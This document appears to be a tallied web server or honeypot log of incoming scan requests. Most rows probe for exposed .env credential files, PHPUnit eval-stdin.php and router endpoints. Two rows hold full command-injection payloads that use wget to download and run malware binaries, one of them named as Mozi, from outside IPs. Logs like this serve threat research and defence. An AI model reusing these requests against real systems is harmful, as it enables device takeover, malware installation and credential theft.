| 2 | GET | /cgi-bin/.env | HTTP/1.1 |
| 2 | GET | /conf/.env | HTTP/1.1 |
| 6 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 2 | GET | /core/.env | HTTP/1.1 |
| 2 | GET | /crm/.env | HTTP/1.1 |
| 2 | GET | /database/.env | HTTP/1.1 |
| 2 | GET | /dispatch.asp | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 3 | GET | /laravel/.env | HTTP/1.1 |
| 2 | GET | /library/.env | HTTP/1.1 |
| 2 | GET | /local/.env | HTTP/1.1 |
| 2 | GET | /new/.env | HTTP/1.1 |
| 2 | GET | /newsite/.env | HTTP/1.1 |
| 2 | GET | /old/.env | HTTP/1.1 |
| 2 | GET | /photo/ | HTTP/1.1 |
| 2 | GET | /protected/.env | HTTP/1.1 |
| 2 | GET | /public/.env | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//27[.]203[.]4[.]162:46848/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 185.245.96.227/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep[.]jaws | |
| 2 | GET | /sites/all/libraries/mailchimp/.env | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 2 | GET | /src/.env | HTTP/1.1 |
| 2 | GET | /storage/.env | HTTP/1.1 |
| 2 | GET | /vendor/.env | HTTP/1.1 |
| 2 | GET | /vendor/laravel/.env | HTTP/1.1 |
| 2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 2 | GET | /wp-admin/.env | HTTP/1.1 |
| 2 | GET | /wp-content/.env | HTTP/1.1 |
| 2 | GET | /www/.env | HTTP/1.1 |
| 2 | GET | http[:]//fuwu[.]sogou[.]com/404/index.html | HTTP/1.1 |
| 1 | GET | http[:]//www[.]bing[.]com/ | HTTP/1.1 |
| 1 | HEAD | / | HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 2 | POST | /HNAP1/ | HTTP/1.0 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | http[:]//deannecameron[.]website/407f7e0bf2c59c54c2d4c2da4f58752d6bf9284007ded340c819fe5bf2b80537a4896b4b979ecd28cb6d7d4180c68b3b60acab96ad7c6e02ab8176a97542096e02d35c470bf01cdc3f43bb81a04f339a5e3569b256f84f7d44b935ba9217d713 | HTTP/1.1 |
